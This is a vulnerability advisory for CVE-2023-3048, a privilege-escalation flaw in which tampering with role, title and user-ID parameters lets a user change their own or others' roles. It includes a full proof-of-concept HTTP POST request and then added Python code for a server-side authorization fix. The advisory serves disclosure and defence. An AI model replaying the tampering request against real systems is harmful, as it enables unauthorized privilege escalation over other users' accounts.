
CVE-ID: CVE-2023-3048
Author: Efe Özel
Team: Ömer Yılmaz – Murat Öztürk
Parameter: KullaniciRolID & UnvanID & KullaniciID
Details: By changing the “KullaniciRolID” and “UnvanID” values, the user's own existing role can be changed, and the roles of other users can be changed by also altering the “KullaniciID” parameter.
HTTP REQUEST
POST /Ayarlar/K_Hesap?Length=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 151
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Ayarlar/KullaniciAyari/20
Cookie: admin=20
KullaniciID=20&KullaniciID=20&AdSoyad=Talas&Eposta=test@test.com&KullaniciRolID=2&UnvanID=1&Tel1=44444&Tel2=44444&X-Requested-With=XMLHttpRequest
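The server-side fix is to derive both the target account and the set of writable fields from the authenticated session rather than from the submitted KullaniciID, KullaniciRolID and UnvanID. The following is an added example of such a check, not code from the affected product: it parses the request body above as constructed sample input, rejects a KullaniciID that differs from the session user unless the session holds the administrator role, and rejects KullaniciRolID/UnvanID from non-administrators; the administrator role id (1) and the list of self-editable fields are assumptions.

```python
from urllib.parse import parse_qs

# Constructed sample input: the form body from the request above.
SAMPLE_BODY = ("KullaniciID=20&KullaniciID=20&AdSoyad=Talas&Eposta=test@test.com"
               "&KullaniciRolID=2&UnvanID=1&Tel1=44444&Tel2=44444"
               "&X-Requested-With=XMLHttpRequest")

SELF_EDITABLE = {"AdSoyad", "Eposta", "Tel1", "Tel2"}   # assumption: profile fields
PRIVILEGED = {"KullaniciRolID", "UnvanID"}              # role and title: admin-only
ADMIN_ROLE_ID = 1                                       # assumption: id of the admin role


class AuthorizationError(Exception):
    pass


def parse_form(body: str) -> dict:
    """Parse the form body; a key repeated with conflicting values is rejected."""
    parsed = parse_qs(body, keep_blank_values=True)
    conflicting = sorted(k for k, v in parsed.items() if len(set(v)) > 1)
    if conflicting:
        raise AuthorizationError(f"conflicting repeated parameters: {conflicting}")
    return {k: v[0] for k, v in parsed.items()}


def authorize_account_update(session_user_id: int, session_role_id: int, form: dict) -> dict:
    """Return only the fields this session may apply, with the target user pinned.

    The target account is the session user unless the session is an administrator,
    so a client-supplied KullaniciID cannot redirect the update to another account,
    and KullaniciRolID/UnvanID are dropped as not permitted for non-administrators.
    """
    try:
        target = int(form.get("KullaniciID", session_user_id))
    except ValueError:
        raise AuthorizationError("KullaniciID is not numeric")
    is_admin = session_role_id == ADMIN_ROLE_ID
    if target != session_user_id and not is_admin:
        raise AuthorizationError("KullaniciID does not match the session user")
    allowed = SELF_EDITABLE | (PRIVILEGED if is_admin else set())
    rejected = (PRIVILEGED & set(form)) - allowed
    if rejected:
        raise AuthorizationError(f"privileged fields not permitted: {sorted(rejected)}")
    return {"KullaniciID": target, **{k: v for k, v in form.items() if k in allowed}}


def decide(session_user_id: int, session_role_id: int, body: str) -> dict:
    """Wrapper returning {'ok': True, 'fields': ...} or {'ok': False, 'reason': ...}."""
    try:
        fields = authorize_account_update(session_user_id, session_role_id, parse_form(body))
    except AuthorizationError as exc:
        return {"ok": False, "reason": str(exc)}
    return {"ok": True, "fields": fields}
```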